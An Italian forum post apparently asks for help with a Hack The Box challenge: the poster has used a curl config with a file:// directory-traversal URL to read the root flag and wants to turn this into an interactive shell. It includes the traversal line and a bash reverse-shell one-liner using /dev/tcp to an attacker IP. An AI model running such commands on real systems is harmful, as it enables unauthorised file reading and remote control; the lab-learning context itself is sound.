Quindi sto facendo una sfida HTB in cui ho sfruttato l'uso del riquadro obiettivi per leggere un file che imposta un URL per curl
per attraversare la directory e visualizzare il flag root in un report che fa parte di l'esercizio.
Contenuto file: url = file:///127.0.0.1/../../../root/root.txt
Tutto bello.
Ciò che voglio fare è sfruttare ulteriormente questo per generare in qualche modo una shell leggendo /bin/bash
. Posso leggere la versione alterata di /bin/bash
nel file di report, ma non riesco a capire come eseguirlo in un modo che mi darà una shell interattiva.
Che cosa posso fare per raggiungere questo obiettivo?
EDIT:
Posso creare una shell inversa dal mio utente corrente usando bash e il comando di sotto, non posso farla eseguire come mi piacerebbe da "inside" curl.
bash -i >& /dev/tcp/192.168.1.10/8080 0>&1